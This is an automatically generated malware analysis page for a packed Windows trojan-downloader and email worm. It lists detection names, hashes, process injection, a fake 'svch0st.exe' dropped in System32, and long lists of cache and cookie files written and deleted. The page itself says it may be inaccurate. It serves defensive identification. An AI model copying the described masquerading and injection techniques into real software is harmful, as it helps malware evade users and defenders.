Gen.Variant.Graftor.101169_5ce023bff6

by malwarelabrobot on January 21st, 2017 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Graftor.101169 (B) (Emsisoft), Gen:Variant.Graftor.101169 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 5ce023bff60b4dbb7b7f0574f360735d
SHA1: 2bb62465df3631c0b1e4a5a38a85a8395c8a695a
SHA256: d41912220a296db0adab8d5715e6f9631254f3f94a18af2b0fd000fc053d7b2c
SSDeep: 6144:MeBkqGqO5dUge34e2D61w5qtPruZ/eVapd79WM/F0nBaw:jBwqO5egeotDNuruluaf79D/anY
Size: 413184 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2016-11-06 17:26:17
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

svch0st.exe:3204

The Trojan injects its code into the following process(es):

%original file name%.exe:2956
svch0st.exe:3196
svch0st.exe:2080
svch0st.exe:3188
svch0st.exe:2632

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\svch0st.exe (742 bytes)

The process svch0st.exe:3196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\MTFlashStore[1].swf (1048 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads6[1].htm (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ad_cleaner[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\fl[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8P2IKO3V.txt (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\detail[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\myTab[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[5].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TQEXK3AF.txt (292 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KTNO4VM2.txt (123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#irs01.net\settings.sxx (683 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[2].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z4OFGSEX.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\I5FMQPLV.txt (390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\z_stat[1].js (1058 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\core[1].js (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\os[1].js (59998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\web[1].htm (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\dot[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\6[1].htm (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\165VQSMA.txt (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\stat[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[4].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\irt[1].js (33 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\empty[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\share[1].js (1096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LOVKAMR2.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\3774651[1].htm (951 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\eb3340e4[1].htm (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\5XISSK39\ent.onlylady[1].xml (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\irs01.net\mt_adtracker.sxx (102 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[3].js (11729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\onlyladyomd_new2[1].htm (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[3].gif (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\statisddd-min[1].js (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tools.min[1].js (9530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].js (11987 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\1HUVI2AA\wwwcdn.kimiss[1].xml (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\rclm[1].js (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pv_y[1].js (677 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\search[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[2].js (9448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads6[1].htm (300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery-1.7.2.min[1].js (39451 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (554 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\onlyladyomd_new2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LOVKAMR2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[3].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\165VQSMA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q97SV2MA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\irs01.net\mt_adtracker.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#irs01.net\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads6[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[5].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].gif (0 bytes)

The process svch0st.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GlobalConfig_6.5[1].ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\55ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0 (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\log.txt (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\blhash.dat.bak (1822 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\blhash_6.5.dat[1].zip (502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\SearchEngine.ini.bak (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\bl_6.5[1].dat (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\HLR_cfg.ini.bak (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\GlobalConfig.ini.bak (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (835 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SearchEngine_6.5[1].ini (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\cfg_6.5[1].ini (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (720 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\runtask_6.5[1].dat (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\runtask.dat.bak (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\bl.dat.bak (6 bytes)

The process svch0st.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\0ad38a6488686acc96d4ec67497a33b9[1].xml (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[1].xml (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sxx (528 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UCBFK7X.txt (1121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[2].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ugcBodanPlay[1].js (473593 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.iqiyi.com\settings.sxx (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJU0K3WB.txt (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SL165LVJ.txt (485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_settings.sxx (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\Tipdatavod_201610311735[1].xml (3615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5L8TXOO8.txt (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TH4O9JKH.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[2].xml (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\beacon[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyiclientflash.sxx (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W16263T6.txt (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sxx (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\10382a1b82aa[1].swf (9099 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[2].swf (8061 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\52ba69c7b1d54420bec46c52cec587c6[1].js (71885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ugcBodanPlay_ver[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_UV.sxx (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack.sxx (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1823925a82d4[1].swf (1339 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_player_common.sxx (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\sea1.2[1].js (123932 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[1].js (842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\11.0.1[1].js (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\irt[1].js (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_0.sxx (314 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\quud[1].htm (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\proxy[1].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hasnew[1].action (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[2].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[3].xml (170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_log.sxx (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[1].swf (11138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\1050c72eeb6[1].swf (2283 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_histories.sxx (36 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (541 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tanxssp[1].js (48533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6Y0COW66.txt (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\qa[1].js (4082 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\exsites[1].htm (6692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D6VJBQU7.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\tanxssp[1].js (41931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\787ab6983c8a883fa3c5190ce3cac804[1] (240 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\m[1].htm (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\get_msg[1].action (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\572044000[1] (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3AYVSTOL.txt (1299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pcweb.wonder[1].js (155849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1050f98c2359[1].swf (274705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\WMZUWJRG\www.iqiyi[1].xml (621 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\push[1].js (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ex[1].js (1950 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\572044000[1].htm (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\737NWARW.txt (875 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ares2.min[1].js (49926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PYWE1XWT.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\mgets[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q97SV2MA.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\peerInfo.sxx (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\036300cf212b7b[1].swf (24797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\online[1].js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GN6V4AY.txt (287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\getqd[1].txt (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[3].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C9DWB8JN.txt (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C54EWNSP.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00NB3MLM.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\182321793893[1].swf (1821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\55ZHX71Y.txt (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\common[1].js (145204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].js (13159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\behavior[1].js (508 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ab77b6ea7f3fbf79[1].js (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\videos[1] (19615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[2].xml (224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_tips_statistics.sxx (797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\v_19rra3jt70[1].htm (159638 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\_J.1.2.min[1].js (2221 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S8WLVQD9.txt (1159 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PYWE1XWT.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D6VJBQU7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_UV.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.iqiyi.com\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\peerInfo.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GN6V4AY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UCBFK7X.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_0.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C9DWB8JN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C54EWNSP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_log.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_tips_statistics.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SL165LVJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ex[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[2].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\737NWARW.txt (0 bytes)
